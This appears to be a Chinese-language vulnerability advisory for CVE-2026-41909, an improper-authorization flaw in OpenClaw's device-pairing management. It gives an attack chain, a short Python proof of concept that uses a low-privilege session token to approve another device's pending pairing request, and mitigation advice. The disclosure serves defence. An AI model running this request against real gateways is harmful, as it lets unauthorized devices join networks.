CVE-2026-41909 CVSS 5.4 中危

CVE-2026-41909 OpenClaw不当授权漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41909

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.20之前版本在配对设备管理模块中存在不当授权漏洞。该漏洞允许权限受限的会话枚举并操作配对请求。攻击者若已拥有某设备的配对访问权限，即可利用此漏洞批准或处理同一网关范围内其他无关的待处理设备请求。这可能导致未经授权的设备接入网络，破坏系统的安全隔离性。

技术细节

该漏洞的核心在于OpenClaw处理配对设备管理时的授权逻辑缺陷。在2026.4.20之前的版本中，当系统处理设备配对请求时，未正确验证当前会话是否有权操作特定的目标配对请求。正常逻辑下，一个已配对的设备仅应管理自身的配对状态或仅能查看公开信息。然而，由于缺乏针对“网关范围”内横向操作的有效隔离检查，攻击者利用一个已受损或低权限的配对设备会话，可以通过API端点枚举出同一网关下的所有待处理配对请求。随后，攻击者通过发送包含目标请求ID的特定操作指令（如批准、拒绝），即可劫持其他设备的配对流程。这种不当授权使得攻击者能够将恶意设备接入网络，或阻断合法设备的接入，严重破坏了网关的设备准入控制机制。

攻击链分析

STEP 1

步骤1：获取初始访问权限

攻击者获取OpenClaw网关内一个已配对设备的访问令牌或会话凭证。

STEP 2

步骤2：枚举配对请求

利用该会话访问配对管理API，由于权限校验缺失，攻击者可以列出同一网关下所有待处理的配对请求ID。

STEP 3

步骤3：执行未授权操作

攻击者向API发送恶意请求，强制批准或修改目标（不相关）设备的配对状态，从而控制设备接入流程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41909
# Description: Exploit improper authorization to approve arbitrary pairing requests.
# Attacker needs a valid session for a paired device.

import requests

TARGET_URL = "https://openclaw-instance/api/v1/pairing"
ATTACKER_SESSION_TOKEN = "attacker_stolen_or_valid_token"
# The ID of the victim's pending pairing request that the attacker should not access
TARGET_PAIRING_ID = "pending_request_id_12345"

headers = {
    "Authorization": f"Bearer {ATTACKER_SESSION_TOKEN}",
    "Content-Type": "application/json"
}

# Payload to approve the unrelated pending device
payload = {
    "action": "approve",
    "pairing_id": TARGET_PAIRING_ID
}

try:
    # Exploit the endpoint that lacks proper scope verification
    response = requests.post(f"{TARGET_URL}/manage", json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully approved unrelated device pairing request!")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Attack failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.4.20

防御指南

临时缓解措施

如果无法立即升级，建议严格限制网关内的设备配对权限，并暂时关闭自动配对功能，转为人工审核模式，直到应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表